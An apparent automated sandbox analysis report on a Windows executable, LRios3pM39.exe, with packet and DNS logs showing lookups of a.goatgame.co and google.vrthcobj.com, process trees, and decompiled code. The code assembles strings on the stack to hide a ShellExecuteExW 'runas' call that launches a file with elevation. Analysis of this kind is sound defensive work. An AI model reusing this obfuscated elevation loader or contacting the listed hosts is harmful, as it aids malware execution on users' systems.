Aug 3, 2021 23:30:08.812707901 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812746048 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812783003 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812825918 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812850952 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812932014 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.812968969 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813091993 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813127041 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813847065 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813877106 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813958883 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.813996077 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814023972 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814048052 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814461946 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814516068 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814618111 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814677954 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814712048 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.814740896 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.815788984 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820099115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820147991 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820179939 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820209026 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820240021 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820485115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820519924 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820550919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820585966 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820620060 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.820856094 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.821312904 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.821358919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.821394920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.821424961 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.821460009 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.823764086 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.823812962 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.823863983 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.823913097 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.823945999 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.823976994 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824006081 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824038029 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824069977 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824105978 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824135065 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824306011 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.824456930 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824496984 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824532032 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824567080 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824598074 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824628115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.824709892 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.069317102 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069369078 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069391966 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069413900 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069461107 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069525957 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.069616079 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069643974 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.069695950 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.069883108 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071238995 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071270943 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071295023 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071320057 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071348906 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071369886 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071386099 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071408987 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071424007 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071458101 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071465015 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071480036 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071500063 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071520090 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071536064 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071559906 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071577072 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071593046 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071623087 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071650028 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.071755886 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.071780920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.072043896 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.103363037 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.120287895 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659792900 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659826040 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659846067 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659866095 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659887075 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.659944057 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.659990072 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.660099030 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660123110 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660144091 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660152912 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.660166025 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660186052 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660195112 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.660237074 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.660957098 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.660974979 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.661042929 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.918446064 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918505907 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918555021 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918598890 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918610096 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.918639898 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918679953 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.918745041 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918781042 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.918872118 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.918986082 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.919027090 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.919068098 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.919073105 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.919106960 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.919187069 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.919192076 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.919291019 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.920059919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.920099020 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.920145988 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.920185089 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.920190096 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.920222044 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.920345068 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.923444033 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923489094 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923527002 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923568010 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923607111 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923666000 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.923742056 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:09.923819065 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923851967 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:09.923945904 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.181781054 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181814909 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181828976 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181842089 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181857109 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181869030 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181880951 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.181890965 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182038069 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.182151079 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182168007 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182180882 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182193041 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182256937 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.182373047 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.192317009 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192380905 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192583084 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192605972 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192619085 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192702055 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192723036 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192734957 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192749023 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192761898 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.192914963 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.192998886 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.193011999 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.193017960 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.193022013 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.193551064 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.193625927 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.193666935 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.193675995 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.193778992 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.194041967 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194143057 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194216967 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.194242001 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194305897 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194370985 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:10.194410086 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194722891 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:10.194808960 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:11.369370937 CEST	49739	443	192.168.2.4	172.67.146.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:29:55.561557055 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:29:55.590217113 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 3, 2021 23:29:56.562306881 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:29:56.594803095 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 3, 2021 23:29:57.433166981 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:29:57.468291998 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 3, 2021 23:29:58.369524002 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:29:58.403479099 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 3, 2021 23:29:59.030754089 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:29:59.055938005 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:00.170743942 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:00.206274033 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:00.866367102 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:00.901896000 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:01.905112028 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:01.933101892 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:02.607628107 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:02.632546902 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:03.644952059 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:03.675741911 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:04.500962973 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:04.533834934 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:05.245203018 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:05.253396034 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:05.280611992 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:05.290131092 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:06.291057110 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:06.316445112 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:07.023241043 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:07.055711985 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:08.034720898 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:08.070385933 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:08.872760057 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:08.907968044 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:09.665730953 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:09.698440075 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:10.310719013 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:10.346422911 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:13.649374962 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:13.650245905 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 3, 2021 23:30:13.678105116 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 3, 2021 23:30:13.681931973 CEST	53	51255	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 23:30:05.253396034 CEST	192.168.2.4	8.8.8.8	0x2608	Standard query (0)	a.goatgame.co	A (IP address)	IN (0x0001)
Aug 3, 2021 23:30:13.649374962 CEST	192.168.2.4	8.8.8.8	0x59c6	Standard query (0)	google.vrthcobj.com	A (IP address)	IN (0x0001)
Aug 3, 2021 23:30:13.650245905 CEST	192.168.2.4	8.8.8.8	0x7714	Standard query (0)	google.vrthcobj.com	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 3, 2021 23:30:05.290131092 CEST	8.8.8.8	192.168.2.4	0x2608	No error (0)	a.goatgame.co	172.67.146.70	A (IP address)	IN (0x0001)
Aug 3, 2021 23:30:05.290131092 CEST	8.8.8.8	192.168.2.4	0x2608	No error (0)	a.goatgame.co	104.21.79.144	A (IP address)	IN (0x0001)
Aug 3, 2021 23:30:13.681931973 CEST	8.8.8.8	192.168.2.4	0x59c6	No error (0)	google.vrthcobj.com	34.97.69.225	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 3, 2021 23:30:05.349936008 CEST	172.67.146.70	443	192.168.2.4	49739	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jul 18 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jul 18 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Aug 3, 2021 23:30:05.349936008 CEST	172.67.146.70	443	192.168.2.4	49739	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: LRios3pM39.exe PID: 6960 Parent PID: 5908

General

Start time:	23:30:01
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\LRios3pM39.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LRios3pM39.exe'
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	BBD9C29060936AA812C2B8AEFB14258C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6976 Parent PID: 6960

General

Start time:	23:30:02
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: LRios3pM39.exe PID: 7064 Parent PID: 6960

General

Start time:	23:30:03
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\LRios3pM39.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LRios3pM39.exe' -a
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	BBD9C29060936AA812C2B8AEFB14258C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 7084 Parent PID: 7064

General

Start time:	23:30:04
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: LRios3pM39.exe PID: 6960 Parent PID: 5908 LRios3pM39.exeCOMMON

Executed Functions

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _SHELLEXECUTEINFOW _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				struct HINSTANCE__* _t29;
				_Unknown_base(*)()* _t30;
				int _t36;
				char* _t47;

				_v76 = 0x6c656853;
				_v72 = 0x6578456c;
				_v68 = 0x65747563;
				_v64 = 0x577845;
				_v108 = 0x4c454853;
				_v104 = 0x32334c;
				_t29 = LoadLibraryA( &_v108);
				_t7 =  &_v76; // 0x6c656853
				_t30 = GetProcAddress(_t29, _t7);
				if(_t30 != 0) {
					_v88 = 0x70006f;
					_v84 = 0x6e0065;
					_v80 = 0;
					_v100 = 0x750072;
					_v96 = 0x61006e;
					_v92 = 0x73;
					_t47 =  &_v100;
					if(_a12 == 0) {
						_t47 =  &_v88;
					}
					memset( &(_v60.fMask), 0, 0xe << 2);
					_v60.lpParameters = _a8;
					_v60.cbSize = 0x3c;
					_v60.lpVerb = _t47;
					_v60.fMask = 0x440;
					_v60.nShow = 1;
					_v60.lpFile = _a4;
					_t36 = ShellExecuteExW( &_v60); // executed
					return _t36;
				} else {
					return _t30;
				}
			}

0x004018a7
0x004018b0
0x004018b8
0x004018c0
0x004018c8
0x004018d0
0x004018d8
0x004018de
0x004018e4
0x004018ee
0x004018fc
0x00401904
0x0040190c
0x00401914
0x0040191c
0x00401924
0x0040192c
0x00401930
0x00401932
0x00401932
0x00401941
0x0040194b
0x00401954
0x0040195c
0x00401960
0x00401968
0x00401970
0x00401974
0x0040197b
0x004018f3
0x004018f3
0x004018f3

APIs

LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4
ShellExecuteExW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401974

Strings

SHEL, xrefs: 004018C8
r, xrefs: 00401914
lExe, xrefs: 004018B0
ExW, xrefs: 004018C0
Shel, xrefs: 004018DE, 004018E2
<, xrefs: 00401954
L32, xrefs: 004018D0
s, xrefs: 00401924
o, xrefs: 004018FC
cute, xrefs: 004018B8
n, xrefs: 0040191C

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressExecuteLibraryLoadProcShell
String ID: <$ExW$L32$SHEL$Shel$cute$lExe$n$o$r$s
API String ID: 3429701994-1301878048
Opcode ID: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction ID: 5fbf3ab5474b3f5d763234864d4cabc52bd483d31f91fe065027036cbba7c068
Opcode Fuzzy Hash: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction Fuzzy Hash: 232110B55083819FE310CF15D44875BBBF5BBC8308F408A2DFA98A6220D7B9D6488F97

Uniqueness

Uniqueness Score: -1.00%

Function 0040267E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x408150);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x40cf70 = 0;
